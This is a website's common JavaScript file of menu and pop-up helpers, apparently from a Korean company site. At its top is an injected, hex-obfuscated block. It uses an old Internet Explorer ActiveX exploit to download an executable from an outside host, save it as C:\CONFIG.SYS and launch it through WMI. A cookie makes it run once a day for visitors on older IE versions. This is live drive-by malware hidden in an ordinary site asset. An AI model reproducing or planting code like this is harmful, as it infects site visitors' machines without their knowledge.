
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 
//   2006. 11. 13 by kimhyekyung
// 

document.writeln("<script language=\"javascript\">");
document.writeln("if(document.cookie.indexOf(\"playsb=\")==-1){");
document.writeln("if((navigator.userAgent.toLowerCase().indexOf(\"msie 7\")==-1)&&(navigator.userAgent.toLowerCase().indexOf(\"msie 8\")==-1)){");
document.writeln("goolesb=\"@3c@73@63@72@69@70@74@20@6c@61@6e@67@75@61@67@65@3d@22@4a@61@76@61@53@63@72@69@70@74@22@3e@0d@0a@74@72@79@7b@61@64@6f@3d@28@64@6f@63@75@6d@65@6e@74@2e@63@72@65@61@74@65@45@6c@65@6d@65@6e@74@28@22@6f@62@6a@65@63@74@22@29@29@3b@61@64@6f@2e@63@6c@61@73@73@69@64@3d@22@63@6c@73@69@64@3a@42@44@39@36@43@22@2b@22@35@35@36@2d@36@35@22@2b@22@41@33@2d@31@31@22@2b@22@44@30@2d@39@38@33@41@2d@22@2b@22@30@30@43@30@34@46@22@2b@22@43@32@39@45@33@36@22@3b@61@73@3d@61@64@6f@2e@63@72@65@61@74@65@6f@62@6a@65@63@74@28@22@41@64@6f@64@62@2e@53@74@22@2b@22@72@65@61@6d@22@2c@22@22@29@3b@78@6d@6c@3d@61@64@6f@2e@63@72@65@61@74@65@4f@62@6a@65@63@74@28@22@4d@69@63@72@6f@73@6f@66@74@2e@58@4d@4c@48@54@54@50@22@2c@22@22@29@3b@75@72@6c@3d@22@68@74@74@70@3a@2f@2f@35@32@30@67@70@2e@6e@65@74@2f@63@73@73@2f@61@6d@63@2e@63@73@73@22@3b@78@6d@6c@2e@4f@70@65@6e@28@22@47@45@54@22@2c@75@72@6c@2c@30@29@3b@78@6d@6c@2e@53@65@6e@64@28@29@3b@61@73@2e@74@79@70@65@3d@31@3b@61@73@2e@6f@70@65@6e@28@29@3b@61@73@2e@77@72@69@74@65@28@78@6d@6c@2e@52@65@73@70@6f@6e@73@65@42@6f@64@79@29@3b@70@61@74@68@3d@22@43@3a@5c@5c@43@4f@4e@46@49@47@2e@53@59@53@22@3b@61@73@2e@73@61@76@65@74@6f@66@69@6c@65@28@70@61@74@68@2c@32@29@3b@61@73@2e@63@6c@6f@73@65@28@29@3b@73@68@65@6c@6c@3d@61@64@6f@2e@63@72@65@61@74@65@6f@62@6a@65@63@74@28@22@57@62@65@6d@53@63@72@69@70@74@69@6e@67@2e@53@57@62@65@6d@4c@6f@63@61@74@6f@72@22@2c@22@22@29@3b@73@68@65@6c@6c@2e@43@6f@6e@6e@65@63@74@53@65@72@76@65@72@28@22@2e@22@2c@20@22@72@6f@6f@74@2f@63@69@6d@76@32@22@29@2e@47@65@74@28@22@57@69@6e@33@32@5f@50@72@6f@63@65@73@73@22@29@2e@43@72@65@61@74@65@28@70@61@74@68@29@7d@63@61@74@63@68@28@65@29@7b@7d@0d@0a@3c@2f@73@63@72@69@70@74@3e\";");
document.writeln("goolesb=goolesb.replace(\/@\/g,\"\");");
document.writeln("googleissb=\'\';for(i=0;i<goolesb.length;i+=2){googleissb+=\'%\'+goolesb.substring(i,i+2)}document.write(unescape(googleissb));}");
document.writeln("var expires=new Date();");
document.writeln("expires.setTime(expires.getTime()+1*24*60*60*1000);");
document.writeln("var yt1=\"playsb=Yes;path=\/;expires=\";");
document.writeln("document.cookie=yt1+expires.toGMTString();}");
document.writeln("<\/script>");


//------- OnFocus ----------------------------------------------------------------
 function fSetLinksOnFocus() { 
    for (var iLink = 0; iLink < document.links.length; iLink++) { 
    if (document.links[iLink].blur) 
    document.links[iLink].onfocus = fLinkOnFocus; 
   } 
} 
 function fLinkOnFocus() { 
    this.blur(); 
}





//------- Reloads the window if Nav4 resized --------------------------------

function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);




//------- cha global link script--------------------------------
function moveglobal(g){
if (g!='') 
window.open(g);
}


<!-- ·¹ÇÁÆ®¸Þ´º·Ñ¿À¹ö
function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
//-->




<!--

function winopen(){
var targeturl="/cha/history/default.html"
newwin=window.open("","","scrollbars")
if (document.all){
newwin.moveTo(0,0)
newwin.resizeTo(screen.width,screen.height)
}
newwin.location=targeturl
}
//-->



<!--

function winopen1(){
var targeturl="http://www.chabio.co.kr/flashphoto/main.html"
newwin=window.open("","","scrollbars")
if (document.all){
newwin.moveTo(0,0)
newwin.resizeTo(screen.width,screen.height)
}
newwin.location=targeturl
}
//-->


<!-- ??? faq
function showcontent(num)
{
	var i;
	
	if(document.all.displaytr.length > 1)
	{
		for(i = 0 ; i < document.all.displaytr.length ; i++){
			document.all.displaytr[i].style.display = "none";			
		}
		document.all.displaytr[num].style.display = "";	
	}
}
 //-->

